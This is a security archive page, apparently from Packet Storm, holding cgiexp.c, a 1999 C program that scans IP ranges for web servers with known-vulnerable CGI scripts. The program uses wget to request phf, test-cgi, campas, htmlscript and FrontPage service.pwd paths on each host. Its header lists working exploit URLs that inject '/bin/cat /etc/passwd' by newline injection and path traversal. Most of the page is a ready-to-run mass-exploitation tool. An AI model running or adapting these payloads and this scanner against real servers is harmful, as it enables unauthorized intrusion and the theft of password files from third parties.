what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

cgiexp.c

cgiexp.c
Posted Nov 5, 1999
Authored by shadowpenguin

This utility lists the servers which have the security vulnerabilities of CGI program. This utility supports the pht, test-cgi, nph-test-cgi, campas, htmlscritp, servce, pwd. The addition of new vulnerabilities is very easy.

tags | cgi, vulnerability
systems | unix
SHA-256 | d4a27daf41edaca44387d84582a47076dd8c2e2c284b8050549e4fece0afa2f9

cgiexp.c

Change Mirror Download
/*=============================================================================
CGI seculity holes scanner - CGI exploit Ver1.10
The Shadow Penguin Security (http://shadowpenguin.backsection.net)
Written by UNYUN (shadowpenguin@backsection.net)

*Target Hole
phfAtest-cgiAnph-test-cgiAcampasAhtmlscriptAservice.pwd

*Test
http://www.hoge.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
http://www.hoge.com/cgi-bin/test-cgi?\help&0a/bin/cat%20/etc/passwd
http://www.hoge.com/cgi-bin/nph-test-cgi?/*
http://www.hoge.com/cgi-bin/campas?%0a/bin/cat%0a/etc/passwd
http://www.hoge.com/cgi-bin/htmlscript?../../../../etc/passwd
http://www.hoge.com/_vti_pvt/service.pwd
------------------------------------------------------------
*/
#include <unistd.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <string.h>
/*
#include <netinet/in.h>
#include <netdb.h>
*/

#define LOGNAME "cgiexp.log"
#define TIMEOUT_V 2 /* Connection Timeout value */
#define MAX_IPLEN 16
#define MAX_URLLEN 1000

/* exploitable CGI holes (easy to add) */
static char *holes[]={ "cgi-bin/phf",
"cgi-bin/test-cgi",
"cgi-bin/nph-test-cgi",
"cgi-bin/campas",
"cgi-bin/htmlscript",
"_vti_pvt/service.pwd",
"END"};

int sock;

main(int argc,char *argv[])
{
int separation(char *,unsigned long *);
void attack(char *,FILE *);
int i,j;
unsigned long ips,ipe,ip;
char ipb[MAX_IPLEN],buf[MAX_IPLEN],buf2[MAX_IPLEN];
char cmd[MAX_URLLEN];
FILE *fpw,*fpl;

printf("CGI seculity holes scanner - CGI exploit Ver1.10\n");
printf("The Shadow Penguin Security Inc.\n\n");

if (argc==2){
if ((fpl=fopen(argv[1],"r"))==NULL){
printf("File not found '%s'\n",argv[1]);
exit(1);
}
}else{
printf("Start IP address : ");
scanf("%s",buf);

if (separation(buf,&ips)==-1){
printf("Error : Invalid IP address\n");
exit(1);
}
printf("End IP address : ");
scanf("%s",buf2);

if (separation(buf2,&ipe)==-1){
printf("Error : Invalid IP address\n");
exit(1);
}
}
if ((fpw=fopen(LOGNAME,"w"))==NULL){
printf("File write error '%s'\n",LOGNAME);
exit(1);
}
if (argc==2){
for (;;){
if (feof(fpl)) break;
fscanf(fpl,"%s",ipb);
attack(ipb,fpw);
}
fclose(fpl);
}else{
for (ip=ips;ip<=ipe;ip++){
sprintf(ipb,"%lu.%lu.%lu.%lu",ip>>24,(ip&0x00ff0000)>>16,
(ip&0x0000ff00)>>8, ip&0x000000ff);
attack(ipb,fpw);
}
}
fclose(fpw);
}

void attack(char *ipb,FILE *fpw)
{
int flag;
int i,j;
char cmd[MAX_URLLEN];
FILE *fp;
int portscan(int, char *);

printf("%15s...",ipb);
fprintf(fpw,"%15s...",ipb);
if (portscan(80,ipb)==0){
flag=0;
for (i=0;;i++){
if (strcmp(holes[i],"END")==0) break;
for (j=strlen(holes[i])-1;j>=0;j--)
if (holes[i][j]=='/') break;
j++;
remove(holes[i]+j);
sprintf(cmd,"wget -nv %s/%s",ipb,holes[i]);
system(cmd);
if ((fp=fopen(holes[i]+j,"r"))!=NULL){
if (flag==0){
printf("\n");
fprintf(fpw,"\n");
}
printf("Hit!! Running '%s'\n",holes[i]+j);
fprintf(fpw,"Hit!! Running '%s'\n",holes[i]+j);
fclose(fp);
flag++;
}
}
if (flag==0){
printf("no holes\n");
fprintf(fpw,"no holes\n");
}
}else{
printf("\n");
fprintf(fpw,"\n");
}
}

int separation(char *ipaddr,unsigned long *ipl)
{
int i,j,n;
char buf[MAX_IPLEN];
int ip[4];
unsigned long d;

for (n=0,j=0,i=0;i<=strlen(ipaddr);i++){
if (ipaddr[i]=='.' || i==strlen(ipaddr)){
buf[j]=0;
ip[n]=atoi(buf);
if (ip[n]<0 || ip[n]>255) return (-1);
n++; j=0;
}else{
buf[j]=ipaddr[i];
j++;
}
}
if (n!=4) return (-1);
d=256;
*ipl=ip[3]+ip[2]*d+ip[1]*d*d+ip[0]*d*d*d;
return(0);
}

int portscan(int port, char *ipaddr)
{
struct sockaddr_in addr, server;
void timeoutfunc();

sock = socket(AF_INET, SOCK_STREAM, 0);
if (sock < 0){
printf("Socket creation error");
return(-1);
}

memset((char *) &server, 0, sizeof(server));
server.sin_family = AF_INET;
server.sin_addr.s_addr = htonl(INADDR_ANY);
server.sin_port = 0;

if (bind(sock, (struct sockaddr *) &server, sizeof(server)) < 0) {
close(sock);
printf("Bind error ");
return (-2);
}

addr.sin_family = AF_INET;
addr.sin_addr.s_addr = inet_addr(ipaddr);
addr.sin_port = htons(port);

signal(SIGALRM, timeoutfunc);
alarm(TIMEOUT_V);

if (connect(sock,(struct sockaddr *)&addr,sizeof(addr))!=0){
close(sock);
return (-3);
}
close(sock);
return (0);
}
void timeoutfunc()
{
close(sock);
}

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close